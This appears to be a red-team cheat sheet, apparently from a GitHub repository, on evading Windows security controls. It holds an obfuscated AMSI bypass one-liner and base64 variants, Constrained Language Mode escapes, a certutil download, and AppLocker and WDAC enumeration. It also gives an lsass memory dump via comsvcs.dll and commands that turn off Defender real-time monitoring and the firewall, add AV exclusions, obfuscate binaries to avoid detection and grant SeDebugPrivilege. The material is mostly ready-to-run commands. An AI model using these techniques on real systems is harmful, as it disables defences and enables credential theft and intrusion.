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347 lines (286 loc) · 10.7 KB

File metadata and controls

347 lines (286 loc) · 10.7 KB




Get all GPO's applied to a machine

  • Run with elevated prompt
gpresult /H gpos.html

Powershell detections

  • System-wide transcription
  • Script Block logging
  • AntiMalware Scan Interface (AMSI)
  • Constrained Language Mode (CLM) - Integrated with Applocker and WDAC (Device Guard)



Get Execution policy


Bypass execution policy

  • Not meant to be a security measure
powershell –executionpolicy bypass .\script.ps1
powershell –c <cmd>
powershell –enc
powershell.exe -executionpolicy bypass


S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Generating a new string

  • Use the string below
  • Fuck around with invoke-obfuscation till it doesn't get detected anymore

Amsi bypass base64 encoded strings

function b64decode
    param ($encoded)
    $decoded = $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
    return $decoded

$1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=")
$2 = b64decode("YW1zaUluaXRGYWlsZWQ=")
$3 = b64decode("Tm9uUHVibGljLFN0YXRpYw==")


Creating scripts that bypass amsi

Constrained Lanuage Mode

Check the language mode


Escapes for Constrained Language Mode

Launch Powershell Version 2

Powershell.exe -Version 2

Overwrite __PSLockdownPolicy variable

  • If CLM is not implemented correctly and is using __PSLockdownPolicy

Check the __PSLockdownPolicy value

  • Value 4 is enabled
  • Value 8 is disabled
(Get-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy").__PSLockDownPolicy

Set lockdown policy to 8 and check language mode

Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8

Script to disable it

#Requires -RunAsAdministrator

If ( $ExecutionContext.SessionState.LanguageMode -eq "ConstrainedLanguage") {
    Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8

    Start-Process -File PowerShell.exe -Argument "-file $($myinvocation.mycommand.definition)"

Write-Host $ExecutionContext.SessionState.LanguageMode

Start-Sleep -s 10

PowerShdll Run PowerShell with dlls only.

rundll32 PowerShdll,main -i

Download files with certutil

  • You can not use iwr but you can use certutil in constrained language mode
certutil -urlcache -split -f <URL>

Execute scripts

  • It is possible to execute scripts on the filesystem but you can't load them!
  • If applocker is there enumerate it to find a directory that lets you execute scripts in


  • AppLocker rules are split into 5 categories - Executable, Windows Installer, Script, Packaged App and DLLs, and each category can have its own enforcement (enforced, audit only, none).
  • AppLocker has a set of default allow rules such as, "allow everyone to execute anything within C:\Windows*" - the theory being that everything in C:\Windows is trusted and safe to execute.
  • The difficulty of bypassing AppLocker depends on the robustness of the rules that have been implemented. The default rule sets are quite trivial to bypass in a number of ways:
    • Executing untrusted code via trusts LOLBAS's.
    • Finding writeable directories within "trusted" paths.
    • By default, AppLocker is not even applied to Administrators.
  • Uploading into C:\Windows requires elevated privileges, but there are places like C:\Windows\Tasks that are writeable by standard users.
  • DLL enforcement very rarely enabled due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break.
  • Good repo for bypasses:

Check if applocker policy is running

Get-AppLockerPolicy -Effective

Enumerate applocker policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Check applocker policy in registery

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

Parse GPO applocker

Get-DomainGPO -Identity *applocker*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData

Check for WDAC

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

If code integrity is enforced and PowerShell is running in Constrained Langauge Mode use winrs instead of psremoting

runas /netonly /user:<DOMAIN\<USER> cmd.exe
winrs -r:<PC NAME> cmd

Check for the policy

  • .p7b is a signed policy
  • Check if there are any .xml files which didn't got removed with the policy
ls C:\Windows\system32\CodeIntegrity


For example dumping lsass:

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full
dir C:\Users\Public\lsass.dmp

Logging evasion


With admin privileges


With non-admin privileges:

  • Use Winrs instead of PSRemoting to evade System-wide-transcript and deep script block logging
winrs -remote:server1 -u:<COMPUTERNAME>\<USER> -p:<PASS> hostname
Com objects

Defense evasion

Check if windows defender is running

Get-MpComputerStatus | Select RealTimeProtectionEnabled

Get info about Windows Defender


Find excluded folder from Windows Defender

Get-MpPreference | select Exclusion*

Create exclusion

Set-MpPreference -ExclusionPath "<path>"

Parse GPO applocker

Get-DomainGPO -Identity *defender*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData

Disable AV monitoring

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPReference -DisableIOAVProtection $true

powershell.exe -c 'Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPReference -DisableIOAVProtection $true'

Disable Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False 

powershell.exe -c 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'

Open port on firewall

netsh advfirewall firewall add rule name="Allow port" dir=in action=allow protocol=TCP localport=<PORT>

AV Bypass

Method one

Method two

  • Obfuscate binary with
  • Launch ConfuserEx
  • In Project tab select the Base Directory where the binary file is located.
  • In Project tab Select the Binary File that we want to obfuscate.
  • In Settings tab add the rules.
  • In Settings tab edit the rule and select the preset as Normal.
  • In Protect tab click on the protect button.
  • We will find the new obfuscated binary in the Confused folder under the Base Directory.

If script gets detected use:

Compile defendercheck

  • Using visual studio code
csc.exe /target:exe /out:C:\tools\defendercheck.exe C:\Tools\DefenderCheck\DefenderCheck\DefenderCheck\Program.cs

Random notes

pyinstaller.exe --onefile .\
pyarmor pack --clean -e "--onefile " .\


Check current privileges

whoami /priv


Export the current user rights set by the group policies to a text file:

secedit /export /cfg secpolicy.inf /areas USER_RIGHTS

Edit the

  • Change the SeDebugPrivileges to S-1-5-32-544 the Local administrator group.
notepad.exe secpolicy.inf

Save the new user rights set

secedit /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS

Start cmd again

  • Check privileges with whoami if not having SeDebugPrivilege do PsExec.exe -i cmd.exe

Enable SMB shares for local admin users

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-service LanmanServer | restart-service -verbose